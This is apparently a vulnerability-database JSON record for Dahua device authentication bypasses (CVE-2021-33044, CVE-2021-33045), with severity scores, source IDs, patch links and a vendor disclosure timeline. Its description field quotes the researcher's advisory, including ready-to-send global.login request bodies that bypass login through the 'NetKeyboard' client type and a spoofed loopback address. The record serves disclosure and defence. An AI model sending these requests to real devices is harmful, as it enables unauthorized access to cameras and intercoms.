            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2021-33044",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "IPA",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "JVNDB-2024-000007",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2021-103421",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "id": "CNVD-2021-70816",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2021-33044",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Network",
            "author": "IPA",
            "availabilityImpact": "High",
            "baseScore": 8.1,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2024-000007",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-33044",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "IPA",
            "id": "JVNDB-2024-000007",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2021-103421",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2021-70816",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202109-1080",
            "trust": 0.6,
            "value": "CRITICAL"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-103421"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-70816"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012422"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2024-000007"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202109-1080"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33044"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua Technology Multiple products offered by (CWE-287) vulnerabilities exist. In this vulnerability information, DHI-ASI7213Y-V3-T1 Based on the Information Security Early Warning Partnership, the impact on IPA Report to JPCERT/CC Coordinated with the developer. Reporter : Mitsui Bussan Secure Direction Co., Ltd.A remote third party can exploit the product by sending a specially crafted data packet. ID Authentication may be bypassed. Dahua IPC is a series of industrial computer of Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]\n\nSubject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)\n\nAttack vector: Remote\nAuthentication: Anonymous (no credentials needed)\nResearcher: bashis \u003cmcw noemail eu\u003e (2021)\nLimited Disclosure: September 6, 2021\nFull Disclosure: October 6, 2021\nPoC: https://github.com/mcw0/DahuaConsole\n\n-=[Dahua]=-\nAdvisory: https://www.dahuasecurity.com/support/cybersecurity/details/957\nFirmware: https://www.dahuasecurity.com/support/downloadCenter/firmware\n\n-=[Timeline]=-\nJune 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)\nJune 17, 2021: Sent reminder to Dahua PSIRT\nJune 18, 2021: Asked IPVM for help to get in contact with Dahua\nJune 18, 2021: Received ACK from IPVM, told they sent note to Dahua\nJune 19, 2021: ACK received from Dahua PSIRT, asked for additional details\nJune 19, 2021: Additional details including PoC sent\nJune 21, 2021: ACK received, vulnerabilites confirmed\nJune 23, 2021: Dahua PSIRT asked for \"coordinated disclosure\"\nJune 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now\nJune 24, 2021: Received CVE-2021-33044, I asked about the second CVE\nJuly 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for \"coordinated disclosure\"\nJuly 04, 2021: Confirmed \"coordinated disclosure\", once again\nJuly 05, 2021: Dahua PSIRT tried convince me for \"Full Disclosure\" for vendor only, and \"Limited Disclosure\" for outside world\nJuly 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before \"Limited Disclosure\" September 6, 2021. \n               \"Full Disclosure\" will be October 6, 2021,\nAugust 30, 2021: Dahua PSIRT asked to read my \"Limited Disclosure\" note\nAugust 30, 2021: Sent my \"Limited Disclosure\" note\nSeptember 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates\nSeptember 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices\nSeptember 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware\nSeptember 2, 2021: Refused to provide details, as I do expect me to find firmware on their website\nSeptember 3, 2021: Dahua PSIRT informed that R\u0026D will upload updated firmware in batches\nSeptember 6, 2021: Limited Disclosure\nOctober 6, 2021: Full Disclosure\n\n\n-=[NetKeyboard Vulnerability]=-\n\nCVE-2021-33044\n\nVulnerability:\n        \"clientType\": \"NetKeyboard\",\nVulnerable device types: IPC/VTH/VTO (tested)\nVulnerable Firmware: Those devices who do not support \"NetKeyboard\" functionality (older than June 2021)\nProtocol: DHIP and HTTP/HTTPS\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence will simply bypass authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\u003csessionID\u003e}\n\n[Example]\n{\n    \"method\": \"global.login\",\n    \"params\":\n    {\n        \"userName\": \"admin\",\n        \"loginType\": \"Direct\",\n        \"clientType\": \"NetKeyboard\",\n        \"authorityType\": \"Default\",\n        \"passwordType\": \"Default\",\n        \"password\": \"Not Used\"\n    },\n    \"id\": 1,\n    \"session\": 0\n}\n\n-=[Loopback Vulnerability]=-\n\nCVE-2021-33045\n\nVulnerability:\n        \"ipAddr\": \"127.0.0.1\",\n        \"loginType\": \"Loopback\",\n        \"clientType\": \"Local\",\n\nVulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)\nVulnerable Firmware: Firmware version older than beginning/mid 2020. \nProtocol: DHIP\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence pretends that the login request comes from \"loopback\" and will therefore bypass legitimate authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\u003csessionID\u003e}\n\n\n[Example]\nRandom MD5 with l/p: admin/admin\n{\n    \"method\": \"global.login\",\n    \"params\":\n    {\n        \"userName\": \"admin\",\n        \"ipAddr\": \"127.0.0.1\",\n        \"loginType\": \"Loopback\",\n        \"clientType\": \"Local\",\n        \"authorityType\": \"Default\",\n        \"passwordType\": \"Default\",\n        \"password\": \"[REDACTED]\"\n    },\n    \"id\": 1,\n    \"session\": 0\n}\n\nPlain text with l/p: admin/admin\n{\n    \"method\": \"global.login\",\n    \"params\":\n    {\n        \"userName\": \"admin\",\n        \"ipAddr\": \"127.0.0.1\",\n        \"loginType\": \"Loopback\",\n        \"clientType\": \"Local\",\n        \"authorityType\": \"Default\",\n        \"passwordType\": \"Plain\",\n        \"password\": \"admin\"\n    },\n    \"id\": 1,\n    \"session\": 0\n}\n\n[ETX]\n\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33044"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012422"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2024-000007"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-103421"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-70816"
      },
      {
        "db": "PACKETSTORM",
        "id": "164423"
      }
    ],
    "trust": 3.51
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-33044",
        "trust": 5.4
      },
      {
        "db": "PACKETSTORM",
        "id": "164423",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012422",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVN83655695",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2024-000007",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-103421",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-70816",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202109-1080",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33044",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-103421"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-70816"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33044"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012422"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2024-000007"
      },
      {
        "db": "PACKETSTORM",
        "id": "164423"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202109-1080"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33044"
      }
    ]
  },
  "id": "VAR-202109-1875",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-103421"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-70816"
      }
    ],
    "trust": 2.2
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 0.6
      },
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-103421"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-70816"
      }
    ]
  },
  "last_update_date": "2024-01-19T23:24:12.199000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Dahua\u00a0Technology : DHCC-SA-202106-001",
        "trust": 0.8,
        "url": "https://www.dahuasecurity.com/support/cybersecurity/details/957"
      },
      {
        "title": "DHCC-SA-202106-001",
        "trust": 0.8,
        "url": "https://www.dahuasecurity.com/aboutus/trustedcenter/details/582"
      },
      {
        "title": "Patch for Dahua IPC authentication bypass vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/311536"
      },
      {
        "title": "Patch for Identity authentication bypass vulnerabilities in some Dahua products",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/290751"
      },
      {
        "title": "Dahua  IPC Remediation measures for authorization problem vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=164675"
      },
      {
        "title": "PoC",
        "trust": 0.1,
        "url": "https://github.com/mcw0/poc "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-103421"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-70816"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33044"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012422"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2024-000007"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202109-1080"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-287",
        "trust": 1.0
      },
      {
        "problemtype": "Inappropriate authentication (CWE-287) [NVD evaluation ]",
        "trust": 0.8
      },
      {
        "problemtype": "Inappropriate authentication (CWE-287) [IPA evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012422"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2024-000007"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33044"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://seclists.org/fulldisclosure/2021/oct/13"
      },
      {
        "trust": 2.3,
        "url": "https://www.dahuasecurity.com/support/cybersecurity/details/957"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/164423/dahua-authentication-bypass.html"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33044"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/jp/jvn83655695/index.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/mcw0/poc"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/mcw0/dahuaconsole"
      },
      {
        "trust": 0.1,
        "url": "https://www.dahuasecurity.com/support/downloadcenter/firmware"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33045"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-103421"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-70816"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33044"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012422"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2024-000007"
      },
      {
        "db": "PACKETSTORM",
        "id": "164423"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202109-1080"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33044"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-103421"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-70816"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33044"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012422"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2024-000007"
      },
      {
        "db": "PACKETSTORM",
        "id": "164423"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202109-1080"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33044"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-12-30T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-103421"
      },
      {
        "date": "2021-09-14T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-70816"
      },
      {
        "date": "2022-08-31T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-012422"
      },
      {
        "date": "2024-01-18T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2024-000007"
      },
      {
        "date": "2021-10-06T15:11:51",
        "db": "PACKETSTORM",
        "id": "164423"
      },
      {
        "date": "2021-09-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202109-1080"
      },
      {
        "date": "2021-09-15T22:15:10.497000",
        "db": "NVD",
        "id": "CVE-2021-33044"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-01-18T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-103421"
      },
      {
        "date": "2021-09-14T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-70816"
      },
      {
        "date": "2022-08-31T04:47:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-012422"
      },
      {
        "date": "2024-01-18T03:08:00",
        "db": "JVNDB",
        "id": "JVNDB-2024-000007"
      },
      {
        "date": "2021-10-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202109-1080"
      },
      {
        "date": "2021-12-02T13:50:00.800000",
        "db": "NVD",
        "id": "CVE-2021-33044"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202109-1080"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "plural \u00a0Dahua\u00a0 Product certification vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012422"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "authorization issue",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202109-1080"
      }
    ],
    "trust": 0.6
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading...

Loading...

Loading...
  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.